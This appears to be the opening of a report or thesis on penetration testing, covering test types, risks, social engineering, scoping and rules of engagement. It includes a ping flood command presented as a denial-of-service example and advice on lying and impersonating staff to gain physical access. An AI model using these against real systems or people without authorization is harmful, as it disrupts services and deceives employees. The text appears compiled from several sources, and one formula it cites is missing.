You are on page 1of 117

CHAPTER 1 Introduction to Penetration Testing

1.1 Introduction 1.2 Types of Penetration Testing 1.3 Penetration Testing Risks 1.4 Social Engineering 1.5 Rules of Engagement

Penetration Testing
Penetration tests are a great way to identify vulnerabilities that exists in a system or network that has an existing security measures in place. A penetration test usually involves the use of attacking methods conducted by trusted individuals that are similarly used by hostile intruders or hackers. Depending on the type of test that is conducted, this may involve a simple scan of an IP addresses to identify machines that are offering services with known vulnerabilities or even exploiting known vulnerabilities that exists in an unpatched operating system. The results of these tests or attacks are then documented and presented as report to the owner of the system and the vulnerabilities identified can then be resolved. Bear in mind that a penetration test does not last forever. Depending on the organization conducting the tests, the time frame to conduct each test varies. A penetration test is basically an attempt to breach the security of a network or system and is not a full security audit. This means that it is no more than a view of a systems security at a single moment in time. At this time, the known vulnerabilities, weaknesses or misconfigured systems have not changed within the time frame the penetration test is conducted. Penetration testing is often done for two reasons. This is either to increase upper management awareness of security issues or to test intrusion detection and response capabilities. It also helps in assisting the higher management in decision-making processes. The management of an organization might not want to address all the vulnerabilities that are found in a vulnerability assessment but might want to address its system weaknesses that are found through a penetration test. This can happen as addressing all the weaknesses that are found in a vulnerability assessment can be costly and most organizations might not be able allocate the budget to do this. Penetration tests can have serious consequences for the network on which they are run. If it is being badly conducted it can cause congestion and systems crashing. In the worst case scenario, it can result in the exactly the thing it is intended to prevent. This is the compromise of the systems by unauthorized intruders. It is therefore vital to have consent from the management of an organization before conducting a penetration test on its systems or network. Penetration test, occasionally pentest, is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders (who do not have an authorized means of accessing the organization's systems) and malicious insiders (who have some level of authorized access). The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, both known and unknown hardware or software flaws, and

operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities. Security issues uncovered through the penetration test are presented to the system's owner. Effective penetration tests will couple this information with an accurate assessment of the potential impacts to the organization and outline a range of technical and procedural countermeasures to reduce risks. Web applications are widely used to provide functionality that allows companies to build and maintain relationships with their customers. The information stored by web applications is often confidential and, if obtained by malicious attackers, its exposure could result in substantial losses for both consumers and companies. Recognizing the rising cost of successful attacks, software engineers have worked to improve their processes to minimize the introduction of vulnerabilities. In spite of these improvements, vulnerabilities continue to occur because of the complexity of the web applications and their deployment configurations. The continued prevalence of vulnerabilities has increased the importance of techniques that can identify vulnerabilities in deployed web applications. One such technique, penetration testing, identifies vulnerabilities in web applications by simulating attacks by a malicious user. Although penetration testing cannot guarantee that all vulnerabilities will be identified in an application, it is popular among developers for several reasons: (i) it generally has a low rate of false vulnerability reports since it discovers vulnerabilities by exploiting them; (ii) it tests applications in context, which allows for the discovery of vulnerabilities that arise due to the actual deployment environment of the web application; and it provides concrete inputs for each vulnerability report that can guide the developers in correcting the code. Although individual penetration testers perform a wide variety of tasks, the general process can be divided into three phases: information gathering, attack generation, and response analysis. Figure 1 shows a high-level overview of these three phases. In the first phase, information gathering, penetration testers select a target web application and obtain information about it using various techniques, such as automated scanning, web crawling, and social engineering. The results of this phase allow penetration testers to perform the second phase, attack generation, which is the development of attacks on the target application. Often this phase can be automated by customizing wellknown attacks or by using automated attack scripts. Once the attacks have been executed, penetration testers perform response analysisthey analyze the applications responses to determine whether the attacks were successful and prepare a final report about the discovered vulnerabilities. During information gathering, the identification of an applications input vectors (IVs)points in an application where an attack may be introduced, such as user-input fields and cookie fieldsis of particular importance. Better information about an applications IVs generally leads to more thorough penetration testing of the application. Currently, it is common for penetration testers to use automated web crawlers to identify the IVs of a web application. A web crawler visits the HTML pages generated by a web application and analyzes each page to identify potential IVs. The main limitation of this approach is that it is incomplete because web crawlers are typically unable to visit all of the pages of a web application or must provide certain values to the web application in order to cause additional HTML pages to be shown. Although penetration testers can make use of the information discovered by web crawlers, the incompleteness of such information results in a potentially large number of vulnerable IVs remaining undiscovered. Another challenging aspect of penetration testing is determining whether an attack is successful. This task is complex because a successful attack often produces no observable behavior (i.e. it may produce a side effect that is not readily visible in the HTML page produced by the web application) and requires manual, time-consuming analysis to be identified. Existing approaches to automated response analysis tend to suffer from imprecision because they are based on simple heuristics.

Fig-1

Penetration tests are valuable for several reasons:


1. Determining the feasibility of a particular set of attack vectors. 2. Identifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequence. 3. Identifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software. 4. Assessing the magnitude of potential business and operational impacts of successful attacks. 5. Testing the ability of network defenders to successfully detect and respond to the attacks. 6. Providing evidence to support increased investments in security personnel and technology Penetration tests can be conducted in several ways. The most common difference is the amount of knowledge of the implementation details of the system being tested that are available to the testers. Black box testing assumes no prior knowledge of the infrastructure to be tested. The testers must first determine the location and extent of the systems before commencing their analysis. At the other end of , white box testing provides the testers with complete knowledge of the infrastructure to be tested, often including network diagrams, source code, and IP addressing information. There are also several variations in between, often known as grey box tests. Penetration tests can also be described as "full disclosure" (white box), "partial disclosure" (grey box), or "blind" (black box) tests based on the amount of information provided to the testing party The relative merits of these approaches are debated. Black box testing simulates an attack from someone who is unfamiliar with the system. White box testing simulates what might happen during an "inside job" or after a "leak" of sensitive information, where the attacker has access to source code, network layouts, and possibly even some passwords

The services offered by penetration testing firms span a similar range, from a simple scan of an organization's IP address space for open ports and identification banners to a full audit of source code for an application. Penetration testing is one of the oldest methods for assessing the security of a computer system. The idea behind penetration testing methodologies is that the penetration tester should follow a pre-scripted format during test as dictated by the methodology. A penetration testing methodology was proposed in this research. It is also important to consider a policy that should be followed by both the tester and the client to reduce financial and confidential disparities, and to bring conformity to the operations between the both parties, so this research suggests a policy that should be followed by penetration testers and clients of the penetration tests. Penetration testing is increasingly used by organizations to assure the security of Information systems and services, so that security weaknesses can be fixed before they get exposed. But when the Penetration test is performed without a well planned and professional approach it can result to what it is supposed to prevent from. In order to protect company data, companies often take measures to guarantee the availability, confidentiality and integrity of data or to ensure access for authorized persons only.

Why do we perform Penetration testing?


Hackers like to spend most of their time finding holes in computer systems where mostly bad coding are to blame in creating vulnerabilities. Hackers then like to take this knowledge and apply it to real world scenarios by attacking your network. They may be doing this as a grudge because they werent hired by your company, or perhaps was fired at some stage or even they dont like your company, or just want to get a Kudos kick out of saying, been there, done that! To try and protect our computer systems from these hackers, we need to check for known vulnerabilities and exploits ourselves within our systems. Vulnerabilities can comprise of bugs,application back doors, spy ware that have entered into the coding of the application, operating system or firmware at development time of the product or files that have been replaced at a later date in the form of viruses or Trojans. Over the past two years weve seen many hackers performing denial of service attacks against ISPs (1), Banks (2), and even world governments (3). Carnegie Mellon Software Engineering Institute a Computer Emergency Response Team (CERT) and many other CERTs collate known and new vulnerabilities across all systems, platforms and applications and publish these to the security community and to the companies who have created the systems in a hope that people will become more aware of vulnerable systems and also to allow the creators of these products to create and distribute patches for their products. In the event of a patch taking a while, in most cases a technical work around is published to harden the systems that may be affected by this vulnerability.

Who should perform Penetration testing??


Most auditing companies now provide some level of Penetration testing either from within their company, or sub contracted out to third party security companies. If your company would like a penetration test performed on your current infrastructure, you can outsource to one of these companies to perform tests. Many companies are now looking at creating their own internal security teams that provide a constant day-to-day monitoring of networks and devices, and also spend valuable time researching the latest vulnerabilities from CERTs and collate the relevant security patches in-house under advisement from the Security Community to apply to company systems that are deemed vulnerable or compromised. Unfortunately even if you are patching systems you will always be one or two steps behind the hackers and this is unavoidable, but its much better than being 20 or 30 steps behind them by failing to identify and patch your systems and becoming vulnerable to attack or even worse, allowing your networks to attack other companies networks which is now in the process of being made illegal in several countries. The UK government are already looking at making it part of UK law that you will be fined if you are found attacking other companies or systems on the internet unless you can provide proof that you are taking security seriously within your organization and applying all available patches regularly to try and stop future attacks from happening.The UK government is also trying to push more responsibility onto ISPs, so that ISPs should be looking out for attack vectors, and if they find attacks coming from their customers or within their networks, they are at liberty to cease infected services Until the system is made safe. Penetration testing can be performed by anyone who is either knowledgeable in this area and keeps up to date with the latest security news, penetration applications and researching ways of attack, or has had extensive experience on penetration system testing or is certified.

Outsourcing
Outsourcing penetration testing can be a very costly exercise and one that you might want to only perform once a year. The problem with most networks is that they are constantly changing. People move equipment around the office or between office locations and also install software on PCs and servers, so penetration testing only gives you a snapshot of compromised systems at that moment in time to give you a guide. You also have to be extra vigilant when employing a security testing company.You need to make sure they have liability insurance! Do they come with certified security credentials? (4) Do they bait and switch ? (5) or do they employ real life hackers which have their own agenda ?

Why might we want a penetration test??


Most organizations will have a penetration test due to one of the following reasons:

Some industries and types of data are regulated and must be handled securely (like the financial sector, or credit-card data). In this case your regulator will insist on a penetration test as part of a certification process. You may be a product vendor (like a web developer), and your client may be regulated, so will ask you to have a penetration test performed on their behalf. You may suspect (or know) that you have already been hacked, and now want to find out more about the threats to your systems, so that you can reduce the risk of another successful attack.

You may simply think it is a good idea to be proactive, and find out about the threats to your organization in advance.

Advantages of Penetration Testing:

Business Advantages

1. Can be fast (and therefore cheap) 2. Requires a relatively lower skill-set than source code review 3. Tests the code that is actually being exposed 4. Saves hundreds of thousands of dollars in remediation and notification costs by avoiding network downtime and/or averting a single breach 5. Lowers the costs of security audits by providing comprehensive and detailed factual evidence of an enterprises ability to detect and mitigate risks 6. Creates a heightened awareness of securitys importance at the CXO management level 7. Provides unassailable information usable by audit teams gathering data for regulatory compliance 8. Provides a strong basis for supporting approval of larger security budgets 9. Provides support to evaluate the effectiveness of other security products, either deployed or under evaluation, to determine their ROI

I T / Technical Benefits1. Allows IT staff to quickly and accurately identify real and potential vulnerabilities without being overburdened with numerous false positive indicators 2. Allows IT staff to fine-tune and test configuration changes or patches to proactively eliminate identified risks 3. Assists IT in prioritizing the application of patches for reported known vulnerabilities 4. Enhances the effectiveness of an enterprises SVM program

5. Provides vulnerability perspectives from both outside and within the enterprise 6. It is a force multiplier when it comes to overall impact on IT resources and significantly enhances the knowledge and skill level of IT staff

Disadvantages of Penetration Testing:


a. b.

Too late in the SDLC Front impact testing only.

1.2 DIFFERENT TYPES OF PENETRATION TESTING

Blackbox Testing
Blackbox security testing is more commonly referred to as ethical hacking. Blackbox testing primarily focuses upon the externally facing components of an application or networkwhat a potential hacker might see from the Internet. In a blackbox testing scenario, analysts are typically provided with little or no information about the target environment. Usually only a target websites address (URL) or a range of internet addresses (IP addresses) are provided, although in the case of website or application targets, login credentials are supplied. In this way, blackbox testing more accurately simulates a real-world attack by a malicious hacker possessing zero or limited knowledge of the target site or network. Just like a hacker, analysts scan the target environment searching for all exploitable attack vectors. While BLACKBOX testing is a relatively quick and affordable way to determine if an Internet-facing application or network is susceptible to various forms of attack, it comes with certain limitations. A blackbox test constitutes the bare minimum level of security analysis. Blackbox testing wont identify every vulnerability that becomes exploitable once a hacker has breached the perimeter. Nor is a blackbox test going to yield an exhaustive list of the individual instances for each vulnerability that becomes exposed once a hacker has gained initial access to the target environment. Finally, blackbox testing is conducted for a limited duration, whereas true hackers have no such time restrictions, which is a significant difference given current Intrusion Prevention System (IPS) technologies. Therefore, the benefits and limitations of blackbox penetration testing need to be understood this is not a

comprehensive test of website, application or network security, but rather an initial assessment of that systems perimeter integrity.

Graybox Testing
Graybox penetration testing is also sometimes referred to as informed penetration testing or assisted blackbox testing. This method of testing is similar to blackbox penetration testing, however the analysts are given detailed information about the application or network, such as network architecture diagrams or access to the application source code. These details, aid analysts in finding and verifying vulnerabilities they might have missed with a blackbox test. Gray box penetration testing provides a more thorough assessment of the target site or networks security, discovering vulnerabilities that are only visible once inside that environment, rather than just those facing the Internet. In a graybox application penetration test, the analyst tests the strength of the existing security controls as an insider, looking for vulnerabilities from the perspective of a trusted user with detailed knowledge of the environment. Upon successful login, the analyst sends malicious input to the application manually or by using special tools to determine how the application responds:
Does the application provide an entry-point to other resources, servers, or databases? Does the application provide useful information to take advantage of other attack vectors?

Does the application allow a user to perform an unauthorized escalation of their access?

Another value of gray box testing is that analysts are able to work directly with network and/or development teams to pinpoint the exact location of vulnerabilities - the actual lines in the source code or insecure network settings and configurations. Conversely in a blackbox test, the vulnerability could be demonstrated but its source might go unidentified. With a graybox test, a client company receives detailed information on the individual instances of vulnerabilities and their locations with both blackbox and graybox testing, AsTech provides remediation recommendations and risk ratings based on the unique risk evaluation criteria most appropriate for each client.

An effective security program integrates multiple approaches, combining penetration testing with other types of assessment, such as application security code review, architecture review, and threat modeling. When performed in combination, these assessments provide a more comprehensive picture of the overall security posture of the target environment.

Environment Attacks
Software does not execute in isolation. It relies on any number of binaries and code-equivalent modules, such as scripts and plug-ins. It may also use configuration information from the registry or file system as well as databases and services that may reside anywhere. Each of these environmental interactions may be the source of a security breach and therefore must be tested. There are also a number of important questions you must ask about the degree of trust that your application has in these interactions, including the following: How much does the application trust its local environment and remote resources? Does the application put sensitive information in a resource (for instance, the registry) that can be read by other applications? Does it trust every file or library it loads without verifying the contents? Can an attacker exploit this trust to force the application to do his bidding? In addition to the trust questions, penetration testers should watch for DLLs that might be faulty or have been replaced (or modified) by an attacker, binaries, or files with which the application interacts that are not fully protected by access control lists (ACLs) or are otherwise unprotected. Testers must also be on the lookout for other applications that access shared memory resources or store sensitive data in the registry or in temporary files. Finally, testers must consider factors that create system stress, such as a slow network, low memory, and so forth, and determine the impact of these factors on security features. Environment attacks are often conducted by rigging an insecure environment and then executing the application within that environment to see how it responds. This is an indirect form of testing; the attacks are waged against the environment in which the application is operating. Now let's look at direct testing.

Input Attacks
In penetration testing, the subsets of inputs that come from untrusted sources are the most important. These include communication paths such as network protocols and sockets, exposed remote functionality

such as DCOM, remote procedure calls (RPCs) and Web services, data files (binary or text), temporary files created during execution, and control files such as scripts and XML, all of which are subject to tampering. Finally, UI controls allowing direct user input, including logon screens, Web front ends, and the like, must also be checked. Specifically, we will want to determine whether input is properly controlled: are good inputs allowed in and bad ones (such as long strings, malformed packets, and so forth) kept out? Suitable input checking and file parsing are critical. You'll need to test to see whether dangerous input can be entered into UI controls, and find out what happens when it is. This includes special characters, encoded input, script fragments, format strings, escape sequences, and so forth. You'll need to determine whether long strings that are embedded in packets fields or in files and are capable of causing memory overflow will get through. Corrupt packets in protocol streams are also a concern. You must watch for crashes and hangs and check the stack for exploitable memory corruption. Finally, you must ensure that such things as validation and error messages happen in the right place (client-side rather than server side) as a proper defense against bad input. Input attacks really are like lobbing grenades against an application. Some of them will be properly parried and some will cause the software to explode. It's up to the penetration team to determine which are which and initiate appropriate fixes.

Data and Logic Attacks


Some faults are embedded in an application's internal data storage mechanisms and algorithm logic. In such cases, there seem to be design and coding errors where the developer was assuming either a benevolent user or failed to consider some code paths where a user might tread.

Denial of service

is the primary example of this category but certainly not the most dangerous.

Denial of service attacks can be successful when developers have failed to plan for a large number of users (or connections, files, or whatever inputs cause some resource to be taxed to its limit). However, there are far more insidious logical defects that need to be tested. For example, information disclosure can happen when inputs that drive error messages and other generated outputs reveal exploitable information to an attacker. One practical example of such data that you should always remove is any hardcoded test accounts or test APIs (which are often included in internal builds to aid test automation). These can

provide easy access to an attacker. Two more tests you should run are to input false credentials to determine if the internal authorization mechanisms are robust, and choose inputs that vary the code paths. Often one code path is secure but the same functionality can be accessed in a different way, which could inadvertently bypass some crucial check.

Ping of death

Ping of death is an another type of DOS attack that can shut down systems, and causing a great harm to the system. Default ICMP echo packet size of 64 bytes, many computer system could not handle the incoming packet larger the default packet size. In ping of death attack an attacker generates ICMP echo packets of over 65,535 bytes that is illegal. If you ping to a host like ping 192.168.1.1 What would happen if you do this thing like ping 192.168.0.1 -l 65500 -n 10000 This, in effect, pings the target machine 192.168.0.1 continuously [10,000 times] with 64 kBs of data.

Distributed DOS

Distributed denial of service attack or DDOS attack is a attack in which an attacker uses several machine to launch DOS attack that's why it is difficult to handle. In DDOS attack multiple compromised system that already infected are uses against the victim computer. In this case it is difficult to track the attacker because this attack generates from several IP addresses, and it is difficult to block.

Overall Defense
There are no any single way to prevent DOS attack because of it varying nature, there are some effective way to avoid and reduce to effect of this attack.

Install and maintain anti-virus software. Install a firewall, and configure it to restrict traffic coming into and leaving your computer (Firewall ,Firewall 2)

Don't Be Deterred
Penetration testing is very different from traditional functional testing; not only do penetration testers lack appropriate documentation, but they also must be able to think like users who intend to do harm. This point is very importantdevelopers often operate under the assumption that no reasonable user would execute a particular scenario, and therefore decline a bug fix. But you really can't take chances like that. Hackers will go to great lengths to find vulnerabilities and no trick, cheat, or off-the-wall test case is out of bounds. The same must be true for penetration testers as well.

1.3 PENETRATION TESTING RISKS


The difference between a real attack and a penetration test is the penetration testers intent, authority to conduct the test, and lack of malice. Because penetration testers may use the same tools and procedures as a real attacker, it should be obvious that penetration testing can have serious repercussions if its not performed correctly. Even if your target company ceased all operations for the time the penetration test was being conducted, there is still a danger of data loss, corruption, or system crashes that might require a reinstall from bare metal. Few, if any, companies can afford to stop functioning while a penetration test is being performed. Therefore it is incumbent on both the target organization and the penetration test team to do everything in their power to prevent an interruption of normal business processes during penetration testing operations.

Risk is a measure of probability and severity of unwanted effects on software development projects.

The current strategies for evaluating or validating IT systems and network security are focused on examining the results of security assessments (including red-teaming exercises, penetration testing, vulnerability scanning, and other means of probing defenses for weaknesses in security), and on examining the building blocks, processes, and controls (for example: auditing business processes and procedures for security policy compliance, assessing the quality of security in infrastructure components, and reviewing system development and administration processes for security best practices).

Risk
Every organization has a mission. In this digital era, as organizations use automated information technology (IT) systems1 to process their information for better support of their missions, risk management plays a critical role in protecting an organizations information assets, and therefore its mission, from IT-related risk.

An effective risk management process is an important component of a successful IT security

program. The principal goal of an organizations risk management process should be to protect the organization and its ability to perform their mission, not just its IT assets. Therefore, the risk management process should not be treated primarily as a technical function carried out by the IT experts who operate and manage the IT system, but as an essential management function of the organization. Risk is the net negative impact of the exercise of a vulnerability, considering both the probability and the impact of occurrence. Risk management is the process of identifying risk, assessing risk, and taking steps to reduce risk to an acceptable level. This guide provides a foundation for the development of an effective risk management program, containing both the definitions and the practical guidance necessary for assessing and mitigating risks identified within IT systems. The ultimate goal is to help organizations to better manage IT-related mission risks.

where UE stands for an unwanted event (risk factor); P(UE) is the probability that UE occurs; I(UE) stands for the impact (or cost) due to the occurrence of UE. As an example, we can consider the following situation: UE = {Resignation of a senior analyst}, I(UE) = (1.a) {6 months delay} and P(UE) = 0.25 then: V(UE) = 6 * 0.25 = 1.5 (months)

Risk Management Process


RM is a continuous process, which aims at applying suitable tools, procedures, and methodologies to avoid that risk occurs or keep it within stated limits (SEI, 2002). Some studies describe several basic steps of RM in slightly different ways, but substantially they report a process, which similarly to the one that Figure 1 depicts is based on the stages below.

Identify: Includes the identification of the internal and external sources of risk through a suitable
taxonomy (Higuera, 1996) (SEI, 2002), as depicted in Table 1. Risk Identification involves stakeholders and depends on the project context.

Analyze: Aims at understanding when, where, and why risk might occur, through direct queries to
stakeholders about the probability and impact of risk elements. The prior probability is evaluated. This is the probability that an event (e.g., project delay) could happen before the project starts. This is calculated through prior information.

Plan: In order to establish a strategy to avoid or mitigate the risk, decisions have to be made. In this
stage, contingency plans are stated as well as the related triggering thresholds. Risk-controlling actions are defined and selected. Figure1: Risk Management Process.

Identify

Analyze

Plan

Document Communicate

Control

Monitoring

Handle

Handle: The planned actions are carried out if the risk occurs.

Monitoring: This is a continuous activity that watches the status of the project, and checks
performance indicators (e.g., quality indicators, for instance the number of defects per size unit). In this stage, data concerning the risk trend is gathered.

Control: It appraises the corrections to be taken on risk mitigation plan in case of deviations. If the
indicators show an increase over the fixed threshold, a contingency plan is triggered. In our opinion, this stage should deal with the posterior probability because events have already occurred; that is, one tries to figure out whether an unwanted event actually had an impact on project objectives.

Document and Communicate: This stage can be truly considered as the core of RM; in fact, all
other stages refer to Documentation and Communication for enabling information exchange.

1.4 Social Engineering


Social engineers use their impersonation skills as a weapon: by dressing up like delivery men, security guards, maintenance personnel, they are able to fool normal corporate security and bypass their way to secure areas, including server rooms, filing rooms and more. In order to be an effective social engineer, one must first learn how to confidently lie. The psychology behind being a good liar is far beyond the scope of this article, but it is a necessity to becoming a good social engineer. Another trait of successful social engineers is extensive knowledge of target technology. While if you're posing as a delivery guy to get access backstage for a Broadway musical you may not really care who the "target" is, professional penetration testers and hackers need to be intimately familiar with the hardware and software equipment that they are trying to access; without perfect knowledge, no one will believe that you are supposed to be in there, fiddling with the hard drives on rack mounted servers in the secure data center. As a social engineer, you need to employ every possible means to fool your target into believing you are any of a plethora of roles, but make sure that you stay unrecognizable and do not let staff realize you are sticking around! This means coming at different times of the day and on different days of the week, etc. Possible means for your to employ include impersonating an electrician, emailing tech support or the front desk with a plea for help, calling the front desk or any other extension of the building and pretending to be someone else, needing urgent access to get a project finished for the "Big Boss." There are nearly infinite attack routes to take when employing social engineering alongside typical network security analysis. Social engineering is the most effective way to gain access to any system, due to the fact that humans are able to override any machine-directed security procedure that might be in place (unlocking the system for attackers). As corporations, it is hard to protect against social engineering attacks, but an effort must be made to teach employees (new and old) to always ask for confirmation from multiple people before

allowing access to any systems or any restricted area to anyone at all. Reinforcing strict security practices such as these could one day mean a corporate America that is impervious to social engineering attacks... but that is nowhere visible, even in the distant future. 1. 2. 3. 4. Will the client provide e-mail addresses of personnel that we can attempt to social engineer? Will the client provide phone numbers of personnel that we can attempt to social engineer? Will we be attempting to social engineer physical access, if so: How many people will be targeted?

It should be noted that as part of different levels of testing the questions for business unit managers systems administrators and help desk personnel may not be required. However, feel free to use the following questions as a guide.

Specify IP Ranges and Domains


Before you start a penetration test you must know what the targets you will be attempting to penetrate are. These targets should be obtained from the customer during the initial questionnaire phase. Targets can be given in the form of specific IP addresses, network ranges, or domain names by the customer. In some instances, the only target the customer gives you is the organizations name and expects you to figure the rest out for yourself. It is important to define if systems like firewalls and IDS/IPS or networking equipment that are between the tester and the final target are also part of the scope.

Validate Ranges
It is imperative that before you start to attack the targets you validate that they are in fact owned by the customer you are performing the test against. Think of the legal consequences you may run into if you start attacking a machine and successfully penetrate it only to find out later down the line that the machine actually belongs to another organization (such as a hospital or government agency). To verify that the targets actually belongs to your customer, you can perform a whois against the targets. To perform a whois against the target you can either use a whois tool on the web such as Internic or a tool on your computer like the following:

user@unix:~$ whois example.com Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: example.COM Registrar: REGISTER.COM, INC. Whois Server: whois.register.com Referral URL: http://www.register.com Name Server: NS1.EXAMPLE.COM Name Server: NS3.EXAMPLE.COM

Status: clientTransferProhibited Updated Date: 17-mar-2009 Creation Date: 05-mar-2000 Expiration Date: 05-mar-2016 Registrant: Domain Discreet ATTN: example.com Rua Dr. Brito Camara, n 20, 1 Funchal, Madeira 9000-039 PT Phone: 1-902-7495331 Email: 940fe48d0a16123306dddf8a5a4c2069@domaindiscreet.com

Registrar Name....: Register.com Registrar Whois...: whois.register.com Registrar Homepage: www.register.com Domain Name: example.com Created on..............: 2000-03-05 Expires on..............: 2016-03-05 Administrative Contact: Domain Discreet ATTN: example.com Rua Dr. Brito Camara, n 20, 1 Funchal, Madeira 9000-039 PT Phone: 1-902-7495331 Email: 940fe48a0a16123337ca6a1281067070@domaindiscreet.com

Technical Contact: Domain Discreet ATTN: example.com Rua Dr. Brito Camara, n 20, 1 Funchal, Madeira 9000-039 PT Phone: 1-902-7495331 Email: 940fe48d0a16123339c7eef67f34a73d@domaindiscreet.com

DNS Servers: ns1.example.com ns3.example.com

Dealing with Third Parties


There are a number of situations where you will be asked to test a service or an application that is being hosted by a third party. This will become more and more prevalent as cloud services are utilized more by organizations. The important thing to remember is that you may have permission to test from your customer, you also need to receive permission from the third party as well. At best, you may anger the hosting party. At worst, you may run afoul of a number of international laws. Some enterprises may not even know that they are using cloud services, or may have forgotten that something is hosted elsewhere. Be prepared to break the news to them when you test, or put a clause in the SOW that covers undisclosed usage of 3rd party resources.

Cloud Services
The single biggest issue with testing cloud service is there is data from multiple different organizations stored on one physical medium. Often the security between these different data domains is very lax. The cloud services provider needs to be alerted to the testing and needs to acknowledge that the test is occurring and grant the testing organization permission to test. Further, there needs to be a direct security contact within the cloud service provider that can be contacted in the event that security vulnerability is discovered that can impact the other cloud customers. Some cloud providers have specific procedures for penetration testers to follow, and may require request forms, scheduling or explicit permission from them before testing can begin. This may seem like an onerous amount of approval for testing, however the risks are to great to the tester otherwise.

ISP
Verify the ISP terms of service with the customer. In many commercial situations the ISP will have specific provisions for testing. Review these terms carefully before launching an attack. There are situations where ISPs will shun and block certain traffic that is deemed to be malicious. This may be acceptable to the customer, it may not. Either way it needs to be clearly communicated with the customer prior to testing.

Web Hosting
This is the same as the other tests, the scope and timing of the test needs to be clearly communicated with the web hosting provider. Also, when communicating with the direct customer you need to clearly articulate you are only testing for web vulnerabilities. You will not be testing for vulnerabilities that can lead to a compromise of the underlying OS infrastructure.

MSSPs
Managed Security Service Providers also may need to be notified of testing. Specifically, you will need to notify the provider when you are testing systems and services that they own. However, there are times when you would not notify the MSSP. It may not be in the best interests of the test to notify the MSSP when you are testing the response time of the MSSP. As a general rule of thumb, any time a device or services explicitly owned by the MSSP is being tested they need to be notified.

DoS Testing
Stress testing or Denial of Service testing should be discussed before you start your engagement. It can be one of those topics that many organizations are uncomfortable with due to the potentially damaging nature of the testing. If an organization is only worried about the confidentiality or integrity of their data, stress testing may not be necessary; however, if the organization is also worried about the availability of their services, then the stress testing should be conducted in a non-production environment that is identical to their production environment.

Goals
Every penetration test should be goal oriented. This is to say we are testing to identify specific vulnerabilities that lead to a compromise of the business or mission objectives of the customer. It is not about finding un-patched systems. It is about identifying risk that will adversely impact the organization.

Primary
The primary goal of a test should not be driven by compliance. There are a number of different justifications for this reasoning. First, compliance does not equal security. While it should be understood that many organizations undergo testing because of compliance it should not be the main goal of the test. For example, you may be hired to test as part of a PCI requirement. There are many companies that process credit card information. However, the traits that make your target organization unique and viable in a competitive market would have the greatest impact to the target organization if they were compromised. Compromising credit cards would be bad. Compromising the email addresses and credit card numbers of all the target organizations customers would be catastrophic.

Secondary
The secondary goals are the ones that are directly related to compliance. Usually these are tied to the primary goals very tightly. For example, getting the credit cards is the secondary goal. Tying that breach of data to the business or mission drivers of the organization is the primary goal. Think of it like this: secondary goals mean something for compliance and IT. Primary goals get the attention of the C-Os.

Business Analysis
Before performing a penetration test it is a good idea to define what level of security maturity your customer is at. There are a number of organizations that choose to jump directly into a penetration test without any level of security maturity. For these customers it is often a good idea to perform a vulnerability analysis first. There is absolutely no shame in doing Vulnerability Analysis (VA) work. Remember, the goal is identifying risks to your target organization. It is not about being a tester. If a company is not ready for a full penetration test, they will most likely get far more value out of a good VA than a penetration test. Establish with the customer what information about the systems they want you to know in advance. You may also want to ask them for information about vulnerabilities they already know about; this will save you time and save them money if you don't have to re-discover and report on what

they already knew. A full or partial white-box test may bring the customer more value than a black-box test, if it isn't absolutely required by compliance. If you are asked to pentest an internal network (and you really should be -- assume the attacker started on the inside or is already there), you will need to gather more information about scope.

1.5 Rules of Engagement


While the scope defines what it is you are supposed to test, the rules of engagement defines how testing is to occur. These are two different aspects that need to be handled independently from each other.

Timeline
You should have a clear timeline for your test. While in scope you defined start and end times, now it is time to define everything in between. We understand that the timeline will change as the test progresses. However, having a rigid timeline is not the goal of creating a timeline. Rather, a timeline at the beginning of a test will allow you and your customer to more clearly identify the work that is to be done and the people that will be responsible for the work. We often use GANTT charts and Work breakdown structure to define the work and the amount of time that each specific section of the work will take. Seeing the schedule broken down like this helps you identify the resources that need to be allocated and it helps the customer identify possible roadblocks that many be encountered during testing.

Disclosure of Sensitive Information


While one of your goals may be to gain access to sensitive information, you may not actually want to view it or download it. This seems odd to newer testers, however, there are a number of situations where you do not want the target data on your system. For example, PHI. Under HIPAA this data needs to be protected. In many situations your testing system may not have a firewall or AV running on it. This would be a good situation where you would not want PHI anywhere near your computer. So the question becomes how can I prove I had access without getting the data? There are a number of different ways you can prove access without showing data. For example, you can display a database schema, you can show permissions of systems you have accessed, you can show the files without showing the content. The level of paranoia you want to employ for your tests is something you will need to decide with your customer. Either way you will want to scrub your test machine of results in between tests. This also applies to the report templates you use as well. As a special side note, if you encounter illegal data (i.e. child porn) immediately notify law enforcement, then your customer in that order. Do not notify the customer and take direction from them. Simply viewing child pornography is a crime.

Evidence Handling
When handling evidence of a test and the differing stages of the report it is incredibly important to take extreme care with the data. Always use encryption and sanitize your test machine between tests. Never hand out USB sticks with test reports out at security conferences. And whatever you do, don't re-use a report from another customer engagement as a template! It's very unprofessional to leave references to another organization in your document.

Capabilities and Technology in Place


Good penetration tests do not simply check for un-patched systems. They also test the capabilities of the target organization. To that end, below is a list of things that you can benchmark while testing. 1. 2. 3. 4. 5. 6. Ability to detect and respond to information gathering Ability to detect and respond to foot printing Ability to detect and respond to scanning and vulnerability analysis Ability to detect and respond to infiltration (attacks) Ability to detect and respond to data aggregation Ability to detect and respond to data ex-filtration

When tracking this information be sure to collect time information. For example, if a scan is detected you should be notified and note what level of scan you were performing at the time.

CHAPTER 2 Review Literature

In this chapter, section 2.1 Steps of Penetration testing, section 2.2 pentest tools, 2.3 Advantages and Disadvantages of pentest , graph
2.1 Steps

of Penetration testing

Pre-engagement Interactions Intelligence Gathering Threat Modeling Vulnerability Analysis Exploitation Post Exploitation Reporting

Pre-engagement Interactions
This phase defines all the pre-engagement activities and scope definitions.

Scoping
Scoping is arguably one of the more important and often overlooked components of a penetration test. Sure, there are lots of books written about the different tools and techniques that can be used for gaining access to a network. However, there is very little on the topic of how to prepare for a test. This can lead to troubles for the testers in areas like Scope Creep, legal issues and disgruntled customers that will never have you back. The goal of this section is to give you the tools and techniques to avoid these pitfalls. Much of the information contained in this section is the result of the experiences of the testers who wrote it. Many of the lessons are ones which we have learned the hard way.

